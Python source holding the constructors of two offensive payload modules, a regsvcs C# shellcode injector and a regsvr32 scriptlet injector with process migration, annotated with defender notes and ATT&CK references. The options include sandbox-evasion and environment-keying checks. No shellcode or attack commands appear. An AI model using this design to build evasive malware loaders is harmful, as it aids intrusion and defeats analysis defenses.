def __init__(self, cli_obj):
    """Set up metadata and default options for the regsvcs C# payload module.

    Only attributes are initialised here; nothing is generated or compiled.
    ``cli_obj`` is the parsed command-line object. This method reads its
    ``msfvenom`` and ``tool`` attributes and hands the whole object to
    ``shellcode_help.Shellcode``.

    Defender context: the module targets execution through regsvcs, i.e.
    signed-binary proxy execution (ATT&CK T1218.009). The optional checks
    configured below are environment-keying / sandbox-evasion controls
    (ATT&CK T1480, T1497), so a sample built with them may stay inert in
    an analysis sandbox that does not match the keyed values.
    """
    # Module identity, presumably shown in the framework's menus.
    self.name = "regsvcs C# Flat Shellcode Injector"
    self.description = "regsvcs C# VirtualAlloc method for inline shellcode injection"
    self.rating = "Excellent"
    self.language = "regsvcs"
    self.extension = "cs"
    self.path = "regsvcs/shellcode_inject/base64"

    # Shellcode helper and the raw CLI options are kept for later stages.
    self.shellcode = shellcode_help.Shellcode(cli_obj)
    self.cli_opts = cli_obj
    self.payload_source_code = ""

    # NOTE(review): when msfvenom is None and cli_obj.tool is truthy,
    # payload_type is never assigned here; confirm it is set elsewhere
    # before anything reads it.
    venom_choice = cli_obj.msfvenom
    if venom_choice is None:
        if not cli_obj.tool:
            self.payload_type = ""
    else:
        self.payload_type = venom_choice

    # NOTE(review): the source layout was collapsed onto one line; this
    # assignment is assumed to be unconditional (outside the elif) - confirm.
    self.cli_shellcode = False

    # Options that require user interaction.
    # Format: {OPTION: [Value, Description]}
    # "X" looks like the "not set" placeholder for the optional checks -
    # TODO confirm against the code that consumes these values.
    self.required_options = {
        "COMPILE_TO_DLL": ["Y", "Compile to a DLL"],
        # The default is "Heap" even though the description above mentions VirtualAlloc.
        "INJECT_METHOD": ["Heap", "Virtual or Heap"],
        "EXPIRE_PAYLOAD": ["X", 'Optional: Payloads expire after "Y" days'],
        "HOSTNAME": ["X", "Optional: Required system hostname"],
        "DOMAIN": ["X", "Optional: Required internal domain"],
        "PROCESSORS": ["X", "Optional: Minimum number of processors"],
        "TIMEZONE": ["X", "Optional: Check to validate not in UTC"],
        "USERNAME": ["X", "Optional: The required user account"],
        "DEBUGGER": ["X", "Optional: Check if debugger is attached"],
        "SLEEP": ["X", 'Optional: Sleep "Y" seconds, check if accelerated'],
    }
def __init__(self, cli_obj):
    """Set up metadata and default options for the regsvr32 scriptlet module.

    Only attributes are initialised here; nothing is generated. ``cli_obj``
    is the parsed command-line object. This method reads its ``msfvenom``
    and ``tool`` attributes and hands the whole object to
    ``shellcode_help.Shellcode``.

    Defender context: the module targets execution through regsvr32 with
    a ``.sct`` scriptlet, i.e. signed-binary proxy execution (ATT&CK
    T1218.010). Typical telemetry to review is regsvr32.exe loading a
    scriptlet, and a System32/SysWOW64 process such as userinit.exe
    appearing with an unexpected parent.
    """
    # Module identity, presumably shown in the framework's menus.
    self.name = "Regsvr32 Shellcode Injection with Process Migration"
    self.description = "Regsvr32 DotNetToJScript Shellcode Injection with Process Migration"
    self.rating = "Excellent"
    self.language = "regsvr32"
    self.extension = "sct"
    self.path = "regsvr32/shellcode_inject/base64_migrate"

    # Shellcode helper and the raw CLI options are kept for later stages.
    self.shellcode = shellcode_help.Shellcode(cli_obj)
    self.cli_opts = cli_obj
    self.payload_source_code = ""

    # NOTE(review): when msfvenom is None and cli_obj.tool is truthy,
    # payload_type is never assigned here; confirm it is set elsewhere
    # before anything reads it.
    venom_choice = cli_obj.msfvenom
    if venom_choice is None:
        if not cli_obj.tool:
            self.payload_type = ""
    else:
        self.payload_type = venom_choice

    # NOTE(review): the source layout was collapsed onto one line; this
    # assignment is assumed to be unconditional (outside the elif) - confirm.
    self.cli_shellcode = False

    # Options that require user interaction.
    # Format: {OPTION: [Value, Description]}
    self.required_options = {
        # Presumably the process named in "Process Migration" above -
        # confirm against the code that consumes this option.
        "PROCESS": ["userinit.exe", "Any process from System32/SysWOW64"],
        "SCRIPT_TYPE": ["JScript", "JScript or VBScript"],
    }